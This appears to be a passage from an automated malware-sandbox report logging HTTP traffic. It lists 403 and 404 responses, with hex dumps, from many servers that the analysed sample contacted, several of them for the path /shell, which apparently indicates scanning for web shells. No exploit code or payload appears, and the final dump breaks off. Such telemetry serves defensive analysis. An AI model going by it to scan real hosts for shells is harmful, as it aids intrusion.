47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 32 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <HTML> <HEAD><TITLE>404 Not Found</TITLE></HEAD> <BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"> <H2>404 Not Found</H2>The requested URL was not found on this server.</body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 19 Jul 2022 11:07:50 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Found
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Web serverDate: Tue, 19 Jul 2022 11:07:45 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveX-Detail: 0x1210, insufficient security levelData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>Web server</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 09:43:00 GMTServer: ApacheContent-Length: 262Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p><hr><address>Apache Server at 127.0.0.1 Port 80</address></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveContent-Length: 109Date: Tue, 19 Jul 2022 11:07:53 GMTExpires: 0Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title>Error 404: Not Found</title></head><body><h1>Error 404: Not Found</h1></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: closeContent-Type: text/html; charset=utf-8Content-Length: 337Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 36 22 3e 3c 74 69 74 6c 65 3e 4e 54 41 31 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 69 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 31 30 2e 31 30 2e 33 34 2e 33 36 2f 3f 74 79 70 65 3d 49 6e 76 61 6c 69 64 20 4b 65 79 77 6f 72 64 26 70 6f 6c 69 63 79 3d 4d 61 69 6e 50 6f 6c 69 63 79 20 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 22 30 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 22 30 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 76 73 70 61 63 65 3d 22 30 22 20 68 73 70 61 63 65 3d 22 30 22 3e 3c 2f 69 66 72 61 6d 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1256"><title>NTA1</title></head><body><iframe src="http://10.10.34.36/?type=Invalid Keyword&policy=MainPolicy " style="width: 100%; height: 100%" scrolling="no" marginwidth="0" marginheight="0" frameborder="0" vspace="0" hspace="0"></iframe></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 19 Jul 2022 11:07:55 GMTServer: ApacheContent-Length: 207Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 73 68 65 6c 6c 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /shellon this server.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: mini_httpd/1.19 19dec2003Date: Mon, 21 Sep 2020 19:58:56 GMTCache-Control: no-cache,no-storeContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 6e 69 5f 68 74 74 70 64 2f 22 3e 6d 69 6e 69 5f 68 74 74 70 64 2f 31 2e 31 39 20 31 39 64 65 63 32 30 30 33 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/mini_httpd/">mini_httpd/1.19 19dec2003</A></ADDRESS></BODY></HTML>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Tue, 19 Jul 2022 11:07:58 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Tue, 19 Jul 2022 11:07:58 GMTContent-Type: text/htmlContent-Length: 167Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 19 Jul 2022 11:07:59 GMTContent-Type: text/htmlContent-Length: 343Connection: keep-aliveVary: Accept-EncodingETag: "62c683a9-157"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Tue, 19 Jul 2022 11:07:58 GMTContent-Length: 1207Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d4 e0 e9 eb 20 e8 eb e8 20 ea e0 f2 e0 eb ee e3 20 ed e5 20 ed e0 e9 e4 e5 ed 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e ce f8 e8
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Tue, 19 Jul 2022 11:07:59 GMTContent-Type: text/htmlContent-Length: 150Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Tue, 19 Jul 2022 11:07:59 GMTContent-Type: text/htmlContent-Length: 167Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Date: Tue, 19 Jul 2022 11:07:58 GMTContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69
